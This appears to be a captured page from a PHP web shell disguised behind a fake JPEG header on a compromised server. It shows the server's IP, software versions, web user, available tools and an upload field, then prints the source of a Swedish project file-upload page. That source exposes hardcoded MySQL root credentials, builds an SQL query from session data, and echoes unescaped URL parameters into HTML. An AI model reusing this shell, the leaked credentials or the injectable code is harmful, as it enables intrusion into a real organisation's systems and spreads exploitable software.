????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 18.217.162.18 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/appsrv.astacus.se/ap-interface/ |
Upload File : |
<?php session_start(); if(!isset($_SESSION['ASTACUS_SSO_INFO']) || (trim($_SESSION['ASTACUS_SSO_INFO'])=='')){ header('location: index.php'); } $SystemUserId = $_SESSION['ASTACUS_SSO_INFO'][0]; $Name = $_SESSION['ASTACUS_SSO_INFO'][1]; $Username = $_SESSION['ASTACUS_SSO_INFO'][2]; $UserGroupId = $_SESSION['ASTACUS_SSO_INFO'][3]; $CompanyId = $_SESSION['ASTACUS_SSO_INFO'][4]; $Email = $_SESSION['ASTACUS_SSO_INFO'][5]; $Phone = $_SESSION['ASTACUS_SSO_INFO'][6]; // Get Company name $link = mysql_connect ("localhost", "root", "root123"); mysql_select_db ("vpa"); $sql = "SELECT Name FROM Company WHERE CompanyId = $CompanyId"; $result = mysql_query($sql); while ($row = mysql_fetch_assoc($result)){ $Company = $row['Name']; } $ProjectID = $_GET['projectId']; ?> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Untitled Document</title> <style type="text/css"> <!-- .style3 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; } --> </style> <script src="js/date-functions.js" type="text/javascript"></script> <script src="js/datechooser.js" type="text/javascript"></script> <link rel="stylesheet" type="text/css" href="js/datechooser.css"> <!--[if lte IE 6.5]> <link rel="stylesheet" type="text/css" href="js/select-free.css"/> <![endif]--> </head> <body> <table width="700" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td width="131"><span class="style3">Inloggad som: <br> Företag: </span></td> <td width="369"><span class="style3"><?php echo($Name . " (".$Username.")");?><br> <?php echo($Company);?> (<?php echo($CompanyId);?>)</span></td> </tr> </table> <br> <table width="700" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td class="style3"><strong><strong><a href="http://astacusproject.astacus.se/astacusproject/ProjectSelected.do?projectId=<?php echo($ProjectID);?>">Hantera filer via AP </a></strong><br> <br> Ladda upp nya filer: <br> <br> <applet name="jumpLoaderApplet" code="jmaster.jumploader.app.JumpLoaderApplet.class" archive="jumploader_z.jar" width="700" height="450" mayscript> <param name="uc_imageEditorEnabled" value="true"/> <param name="uc_zipDirectoriesOnAdd" value="true"/> <param name="uc_directoriesEnabled" value="true"/> <param name="uc_uploadUrl" value="upload.php?projectId=<?php echo($_GET['projectId']);?>&name=<?php echo($_GET['projectname']);?>"/> </applet> </strong> <p><strong> </form> <p> </p> <p><strong> </strong></p> <p><strong> </strong></p></td> </tr> </table> </body> </html>